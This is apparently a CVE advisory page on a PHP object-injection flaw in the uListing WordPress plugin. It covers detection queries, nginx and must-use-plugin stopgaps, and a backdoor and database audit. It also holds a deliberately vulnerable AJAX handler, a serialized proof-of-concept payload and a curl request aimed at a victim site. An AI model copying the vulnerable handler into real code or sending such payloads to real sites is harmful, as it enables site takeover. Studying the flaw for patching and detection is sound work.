WordPress, PHP Object Injection, CVE-2025-1657 (Critical)

How CVE-2025-1657 Works

The uListing WordPress plugin (versions through 2.1.7) performs no capability check in its `stm_listing_ajax` AJAX handler. Any authenticated user, including a subscriber, can reach the handler and use it to modify post metadata, and because the handler unserializes attacker-controlled data it is open to PHP object injection. Unserializing an attacker-supplied object leads to arbitrary code execution when a suitable gadget chain is present (a class loaded on the site whose magic methods act on the injected properties), which is the usual route from object injection to full site compromise. The missing capability check is what turns a low-privilege account into that path, so the flaw is both a privilege escalation and a code-execution issue.
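To make the two defects concrete, here is an illustrative AJAX handler that has both of them (no capability check, unserialize() on request data) beside a hardened version. This is added example code written for this page, not uListing's source; the action names, the `ul_demo_allowed_keys` helper and the meta-key names are invented for illustration.

```php
<?php
// VULNERABLE PATTERN (illustrative, not uListing's code): reachable by any
// logged-in user, no nonce, no capability check, unserialize() on request data.
add_action('wp_ajax_demo_listing_ajax', function () {
    $post_id = (int) $_POST['post_id'];
    $data    = unserialize(stripslashes($_POST['data']));   // attacker-chosen classes are instantiated here
    foreach ($data as $key => $value) {
        update_post_meta($post_id, $key, $value);             // arbitrary meta keys overwritten
    }
    wp_send_json_success();
});

// HARDENED PATTERN: verify intent (nonce), verify authority (capability on this
// specific post), never unserialize untrusted input, and whitelist the meta keys touched.
function ul_demo_allowed_keys(): array {
    return ['listing_price', 'listing_address'];   // assumed key names for the example
}

add_action('wp_ajax_demo_listing_ajax_safe', function () {
    check_ajax_referer('demo_listing_ajax', 'nonce');          // dies with 403 on a bad or missing nonce

    $post_id = isset($_POST['post_id']) ? absint($_POST['post_id']) : 0;
    if (!$post_id || !current_user_can('edit_post', $post_id)) {
        wp_send_json_error(['message' => 'forbidden'], 403);   // subscribers stop here
    }

    // JSON instead of PHP serialization: no object instantiation is possible.
    $data = json_decode(wp_unslash($_POST['data'] ?? ''), true);
    if (!is_array($data)) {
        wp_send_json_error(['message' => 'bad payload'], 400);
    }

    foreach ($data as $key => $value) {
        if (!in_array($key, ul_demo_allowed_keys(), true) || !is_scalar($value)) {
            continue;                                           // unknown keys and nested structures are dropped
        }
        update_post_meta($post_id, $key, sanitize_text_field((string) $value));
    }
    wp_send_json_success();
});
```

The hardened handler uses the `edit_post` meta-capability rather than a role name, so a contributor may edit their own listing while a subscriber is refused; if the plugin genuinely needs to accept PHP-serialized data, the fallback is `unserialize($s, ['allowed_classes' => false])`, which turns any embedded object into `__PHP_Incomplete_Class` instead of instantiating it.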

DailyCVE Form

Platform: WordPress
Version: ≤ 2.1.7
Vulnerability: PHP Object Injection
Severity: Critical
Date: 03/28/2025

What Undercode Says:

Exploitation

1. Payload Crafting:

<?php
// "Exploit" is a placeholder: on a real target the class name and property must match
// a gadget chain already loaded on the site (a class whose __wakeup/__destruct acts on $cmd).
class Exploit {
    public $cmd = 'touch /tmp/pwned';
}
echo serialize(new Exploit);   // O:7:"Exploit":1:{s:3:"cmd";s:16:"touch /tmp/pwned";}

2. AJAX Request:

# Sent as an authenticated subscriber; "data" is the placeholder parameter name used in this write-up
curl -X POST "https://victimsite.com/wp-admin/admin-ajax.php" \
     -b "<SUBSCRIBER_SESSION_COOKIE>" \
     -d "action=stm_listing_ajax&data=<SERIALIZED_PAYLOAD>"

Detection

1. Plugin Version Check:

SELECT option_value FROM wp_options WHERE option_name = 'ulisting_version';

Substitute the site's table prefix if it is not wp_. If the row is absent, read the Version header of the plugin's main file under wp-content/plugins/ instead.

2. Log Analysis:

grep "stm_listing_ajax" /var/log/apache2/access.log

Caveat: admin-ajax.php normally receives the action in the POST body, which a standard access log does not record, so this only catches requests that put the action in the query string. To see the rest, correlate with a WAF or PHP-FPM log that captures request bodies, or audit the database directly.

Mitigation

1. Immediate Action:

wp plugin deactivate ulisting

2. WAF Rule (stopgap only):

location ~ admin-ajax\.php$ {
    # $args is the query string only: a request carrying action=stm_listing_ajax in the
    # POST body (the normal admin-ajax.php form) passes this check untouched.
    if ($args ~ "stm_listing_ajax") { return 403; }
}

Merge this into the existing PHP location instead of adding it as a separate block: a standalone location with no fastcgi_pass stops handing admin-ajax.php to PHP-FPM and breaks every AJAX action on the site. Inspecting the POST body needs a real WAF (ModSecurity, for example) or a check inside WordPress itself.

3. Permanent Fix:

  • Update to uListing ≥ v2.1.8.
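Because admin-ajax.php reads the action from the POST body as well as the query string, a block in the web server only sees part of the traffic. A must-use plugin that gates the action inside WordPress covers both until the update is applied. This is an added example written for this page, not part of uListing or of the original advisory; the `manage_options` threshold is an assumption, adjust it to whoever legitimately needs the endpoint.

```php
<?php
/**
 * Plugin Name: Stopgap gate for stm_listing_ajax (added example, not uListing code)
 * Description: Refuses the vulnerable AJAX action for users below an assumed capability.
 *              Place in wp-content/mu-plugins/ and delete once uListing >= 2.1.8 is installed.
 */

// admin-ajax.php fires admin_init before dispatching wp_ajax_{action}, so this runs
// ahead of the plugin's handler whether the action came by query string or POST body.
add_action('admin_init', function () {
    if (!wp_doing_ajax()) {
        return;
    }
    $action = isset($_REQUEST['action']) ? (string) wp_unslash($_REQUEST['action']) : '';
    if ($action !== 'stm_listing_ajax') {
        return;
    }
    // Assumed threshold: only users who can manage the site may reach the endpoint.
    if (current_user_can('manage_options')) {
        return;
    }
    error_log(sprintf(
        'stm_listing_ajax blocked: user=%d ip=%s',
        get_current_user_id(),
        $_SERVER['REMOTE_ADDR'] ?? 'unknown'
    ));
    wp_send_json_error(['message' => 'forbidden'], 403);   // calls wp_die(); the plugin handler never runs
});
```

Must-use plugins load before regular plugins and cannot be deactivated from the dashboard, so the gate stays in place even if an attacker with a low-privilege account is already poking at the site. The error_log line gives you the user IDs to review under Post-Exploit Analysis.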

Post-Exploit Analysis

1. Backdoor Scan:

find /var/www/html -type f -name "*.php" -exec grep -l 'eval(' {} \;

Also list .php files under wp-content/uploads (there should be none) and compare file modification times against the last legitimate deploy; eval( alone misses payloads hidden behind base64_decode or gzinflate.

2. Database Audit:

SELECT post_id, meta_key, meta_value FROM wp_postmeta WHERE meta_key LIKE '%ulisting%' OR meta_value REGEXP 'O:[0-9]+:"';

The second clause flags any stored value that contains a serialized PHP object (the O:<len>:"<class>" marker), whatever its key; legitimate plugins do store objects, so review hits by class name. Substitute the site's table prefix if it is not wp_.
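A query on meta_key only finds rows by name; what matters after an object-injection attempt is which stored values carry a serialized object and which classes they name. The following script, added for this page and not taken from uListing or the advisory, decodes values with unserialize() in its object-refusing mode and reports the class names it finds. The sample rows are constructed to stand in for the output of the query above; the helper names are invented.

```php
<?php
// Walk a value produced by unserialize($s, ['allowed_classes' => false]) and collect
// the class names of every object it contained (they surface as __PHP_Incomplete_Class).
function ul_collect_object_classes($value, array &$found): void {
    if ($value instanceof __PHP_Incomplete_Class) {
        $props = (array) $value;                        // exposes __PHP_Incomplete_Class_Name
        $found[] = $props['__PHP_Incomplete_Class_Name'] ?? '(unknown)';
        foreach ($props as $k => $v) {
            if ($k !== '__PHP_Incomplete_Class_Name') {
                ul_collect_object_classes($v, $found);  // objects can be nested inside properties
            }
        }
        return;
    }
    if (is_array($value)) {
        foreach ($value as $v) {
            ul_collect_object_classes($v, $found);
        }
    }
}

// Returns the class names embedded in a serialized string, or [] if the string is
// not PHP-serialized data or contains no objects. No class is ever instantiated.
function ul_embedded_objects(string $raw): array {
    $decoded = @unserialize($raw, ['allowed_classes' => false]);
    if ($decoded === false && $raw !== 'b:0;') {
        return [];                                      // plain text, JSON, numbers, ...
    }
    $found = [];
    ul_collect_object_classes($decoded, $found);
    return $found;
}

// Constructed sample rows (post_id, meta_key, meta_value) standing in for a wp_postmeta export.
$rows = [
    [101, 'listing_price',   '250000'],
    [101, 'listing_options', 'a:2:{s:4:"beds";i:3;s:5:"baths";i:2;}'],
    [102, 'listing_options', 'O:7:"Exploit":1:{s:3:"cmd";s:16:"touch /tmp/pwned";}'],
    [103, 'listing_options', 'a:1:{s:6:"config";O:9:"Some_Util":1:{s:4:"path";s:10:"/tmp/x.php";}}'],
];

foreach ($rows as [$post_id, $key, $value]) {
    $classes = ul_embedded_objects($value);
    if ($classes) {
        printf("SUSPECT post_id=%d meta_key=%s objects=%s\n", $post_id, $key, implode(',', $classes));
    }
}
```

Run it with the PHP CLI against a CSV or JSON export of the query results; rows 102 and 103 are reported (the nested Some_Util object is found inside the array), rows 101 are not. Because `allowed_classes => false` never instantiates anything, the audit itself cannot trigger the gadget it is looking for, which a naive `unserialize()` in a cleanup script would.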

References

Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-1657
Extra Source Hub: Undercode
